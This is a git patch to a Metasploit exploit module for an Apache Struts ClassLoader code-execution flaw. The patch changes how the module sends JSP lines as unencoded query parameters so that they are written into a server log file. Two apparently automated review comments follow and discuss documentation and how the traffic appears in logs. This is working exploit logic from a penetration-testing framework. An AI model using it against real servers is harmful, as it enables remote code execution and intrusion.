From de09559cc833f6f0e671180fa2e35c024bbeb2ff Mon Sep 17 00:00:00 2001
From: julianvilas
Date: Wed, 4 Feb 2015 15:32:14 +0100
Subject: [PATCH] Change HTTP requests to succeed when going through HTTP proxies
---
 .../multi/http/struts_code_exec_classloader.rb | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
index 3ecb7193d5..7c8a6dc5b7 100644
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -97,9 +97,13 @@ class Metasploit3 < Msf::Exploit::Remote
 def dump_line(uri, cmd = "")
 res = send_request_cgi({
- 'uri' => uri+cmd,
+ 'uri' => uri,
+ 'encode_params' => false,
+ 'vars_get' => {
+ cmd => ""
+ },
 'version' => '1.1',
- 'method' => 'GET',
+ 'method' => 'GET'
 })
 res
@@ -232,8 +236,11 @@ class Metasploit3 < Msf::Exploit::Remote
 # Dump the JSP to the log file
 print_status("#{peer} - Dumping JSP into the logfile...")
 random_request = rand_text_alphanumeric(3 + rand(3))
+
+ uri = normalize_uri("/", random_request)
+
 jsp.each_line do |l|
- unless dump_line(random_request, l.chomp)
+ unless dump_line(uri, l.chomp)
 fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...")
 end
 end
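Review bot: The added `'encode_params' => false` and `'vars_get' => { cmd => "" }` lines in `dump_line` have no comment, yet they move `cmd` from being appended to the path (`uri+cmd`) to being sent unencoded as a query-string parameter name. The commit subject gives only the motive (HTTP proxies) and does not record this change in request shape, which matters to anyone maintaining detection content keyed to this module's traffic. I would add a comment above `'encode_params'`, for example `# cmd is sent verbatim as a query-string key instead of being appended to the path`. The body of `dump_line` continues outside the hunk.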
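Review bot: The added `uri = normalize_uri("/", random_request)` is undocumented and now sits under the existing `# Dump the JSP to the log file` comment, which describes the loop rather than the path setup. I would give the new line its own comment, for example `# One request path for the whole run; each JSP line is passed to dump_line as cmd`. Because the path is built once before `jsp.each_line`, every request in a run shares the same path under `/`, apparently 3 to 5 characters long per `rand_text_alphanumeric(3 + rand(3))`. That is worth stating for readers correlating these requests in server logs. The enclosing method starts and ends outside the hunk.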